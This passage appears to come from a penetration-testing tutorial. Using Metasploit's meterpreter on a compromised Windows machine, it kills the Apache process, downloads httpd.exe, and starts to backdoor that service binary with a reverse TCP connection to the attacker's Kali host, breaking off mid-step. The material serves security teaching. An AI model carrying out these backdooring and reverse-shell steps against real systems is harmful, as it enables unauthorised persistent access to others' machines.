- Since we cannot backdoor a binary while it is running, the first thing we need to do is to kill the Apache process (httpd.exe), using the kill command followed by the PID of the process:
meterpreter > kill 3820Killing: 3820meterpreter >
- Then, we use the download command within meterpreter to download the service binary we want to backdoor:
meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe...msf exploit(ms17_010_eternalblue) >
To backdoor the service, we will use msfconsole, with a reverse TCP.
- Set the listen address to our Kali Linux machine IP address and use the generate command to backdoor the binary, using the -a